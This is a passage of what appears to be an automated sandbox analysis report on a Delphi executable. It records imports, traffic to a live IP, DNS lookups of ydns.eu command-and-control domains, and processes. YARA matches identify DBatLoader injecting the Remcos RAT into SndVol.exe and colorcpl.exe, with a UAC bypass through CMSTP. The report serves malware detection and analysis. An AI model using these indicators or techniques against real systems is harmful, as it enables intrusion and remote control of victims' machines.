                            RT_STRING0x136a3c0xa0data0.65
                            RT_STRING0x136adc0x2b8data0.4540229885057471
                            RT_STRING0x136d940x474data0.29385964912280704
                            RT_STRING0x1372080x38cdata0.3876651982378855
                            RT_STRING0x1375940x2b4data0.42052023121387283
                            RT_RCDATA0x1378480x10data1.5
                            RT_RCDATA0x1378580x398data0.6945652173913044
                            RT_GROUP_CURSOR0x137bf00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                            RT_GROUP_CURSOR0x137c040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                            RT_GROUP_CURSOR0x137c180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x137c2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x137c400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x137c540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_CURSOR0x137c680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                            RT_GROUP_ICON0x137c7c0x76data0.7542372881355932
                            DLLImport
                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, NotifyWinEvent, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharNextW, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                            opengl32.dllwglMakeCurrent, wglDeleteContext
                            gdi32.dllUnrealizeObject, SwapBuffers, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                            kernel32.dlllstrcpyA, WriteProcessMemory, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, IsBadReadPtr, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                            glu32.dllgluDisk, gluCylinder
                            opengl32.dllglVertex3f, glTranslatef, glRotatef, glPushMatrix, glPopMatrix, glPolygonMode, glNormal3f, glLoadIdentity, glEnd, glEnable, glDisable, glColor3f, glClear, glCallList, glBegin
                            oleaut32.dllGetErrorInfo, VariantInit, SysFreeString
                            ole32.dllCoUninitialize, CoInitialize
                            kernel32.dllSleep
                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                            ntdllNtAllocateVirtualMemory
                            oleacc.dllLresultFromObject
                            winmm.dllsndPlaySoundA
                            advapi32GetTokenInformation
                            ntdllNtWriteVirtualMemory, NtProtectVirtualMemory
                            uRLTelnetProtocolHandler
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSource PortDest PortSource IPDest IP
                            Sep 5, 2023 22:20:41.968466043 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.194540977 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.194904089 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.195539951 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.421448946 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.421928883 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422004938 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422024012 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422048092 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422068119 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422086954 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422105074 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422123909 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422122955 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.422142982 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422166109 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.422173977 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.422174931 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.422228098 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648080111 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648175955 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648250103 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648308992 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648319960 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648369074 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648379087 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648431063 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648492098 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648504019 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648552895 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648613930 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648619890 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648678064 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648740053 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648741007 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648802996 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648865938 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.648869038 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648931026 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648992062 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.648997068 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.649055004 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.649111032 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.649152040 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.649173021 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.649241924 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.649245024 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.649327040 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.649411917 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.875397921 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875504971 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875556946 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875603914 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875649929 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875694036 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875739098 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875782967 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875825882 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875869989 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875912905 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.875924110 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.875956059 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876000881 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876045942 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876051903 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876091957 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876135111 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876163006 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876178026 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876224995 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876235008 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876271009 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876306057 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876316071 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876359940 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876405954 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876418114 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876451969 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876485109 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876497984 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876543999 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876586914 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876588106 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876632929 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876672983 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876677990 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876722097 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876748085 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876768112 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876812935 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876853943 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876857996 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876904011 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876929998 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.876948118 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.876992941 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.877010107 CEST4970680192.168.2.481.161.229.9
                            Sep 5, 2023 22:20:42.877038956 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.877084017 CEST804970681.161.229.9192.168.2.4
                            Sep 5, 2023 22:20:42.877127886 CEST804970681.161.229.9192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Sep 5, 2023 22:20:41.582685947 CEST5381953192.168.2.48.8.8.8
                            Sep 5, 2023 22:20:41.961239100 CEST53538198.8.8.8192.168.2.4
                            Sep 5, 2023 22:20:46.337424994 CEST6031653192.168.2.48.8.8.8
                            Sep 5, 2023 22:20:47.062622070 CEST53603168.8.8.8192.168.2.4
                            Sep 5, 2023 22:20:56.427208900 CEST5181653192.168.2.48.8.8.8
                            Sep 5, 2023 22:20:56.809474945 CEST53518168.8.8.8192.168.2.4
                            Sep 5, 2023 22:21:49.649444103 CEST5438853192.168.2.48.8.8.8
                            Sep 5, 2023 22:21:50.043793917 CEST53543888.8.8.8192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 5, 2023 22:20:41.582685947 CEST192.168.2.48.8.8.80x59b0Standard query (0)wsvdyhrgebwhevawe.ydns.euA (IP address)IN (0x0001)false
                            Sep 5, 2023 22:20:46.337424994 CEST192.168.2.48.8.8.80x1530Standard query (0)tornado.ydns.euA (IP address)IN (0x0001)false
                            Sep 5, 2023 22:20:56.427208900 CEST192.168.2.48.8.8.80x6204Standard query (0)wsvdyhrgebwhevawe.ydns.euA (IP address)IN (0x0001)false
                            Sep 5, 2023 22:21:49.649444103 CEST192.168.2.48.8.8.80x3d44Standard query (0)orifak.ydns.euA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 5, 2023 22:20:41.961239100 CEST8.8.8.8192.168.2.40x59b0No error (0)wsvdyhrgebwhevawe.ydns.eu81.161.229.9A (IP address)IN (0x0001)false
                            Sep 5, 2023 22:20:47.062622070 CEST8.8.8.8192.168.2.40x1530No error (0)tornado.ydns.eu193.42.32.61A (IP address)IN (0x0001)false
                            Sep 5, 2023 22:20:56.809474945 CEST8.8.8.8192.168.2.40x6204No error (0)wsvdyhrgebwhevawe.ydns.eu81.161.229.9A (IP address)IN (0x0001)false
                            Sep 5, 2023 22:21:50.043793917 CEST8.8.8.8192.168.2.40x3d44No error (0)orifak.ydns.eu193.42.32.61A (IP address)IN (0x0001)false
                            • wsvdyhrgebwhevawe.ydns.eu

                            Click to jump to process

                            Target ID:0
                            Start time:22:20:39
                            Start date:05/09/2023
                            Path:C:\Users\user\Desktop\Fnvtdhenapsfwu.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\Fnvtdhenapsfwu.exe
                            Imagebase:0x400000
                            File size:1'243'648 bytes
                            MD5 hash:CFFE529403460C6AFFE0F52C1E7DE602
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:22:20:44
                            Start date:05/09/2023
                            Path:C:\Windows\SysWOW64\SndVol.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\SndVol.exe
                            Imagebase:0x950000
                            File size:226'264 bytes
                            MD5 hash:1EF1A9B89A984DD25DB61DC1AF2548B8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:false

                            Target ID:2
                            Start time:22:20:53
                            Start date:05/09/2023
                            Path:C:\Users\Public\Libraries\Fnvtdhen.PIF
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\Public\Libraries\Fnvtdhen.PIF"
                            Imagebase:0x400000
                            File size:1'243'648 bytes
                            MD5 hash:CFFE529403460C6AFFE0F52C1E7DE602
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:Borland Delphi
                            Yara matches:
                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Fnvtdhen.PIF, Author: Joe Security
                            Antivirus matches:
                            • Detection: 62%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:8
                            Start time:22:21:00
                            Start date:05/09/2023
                            Path:C:\Windows\SysWOW64\colorcpl.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\colorcpl.exe
                            Imagebase:0x60000
                            File size:86'528 bytes
                            MD5 hash:746F3B5E7652EA0766BA10414D317981
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.253092372.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.253076423.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:true

                            No disassembly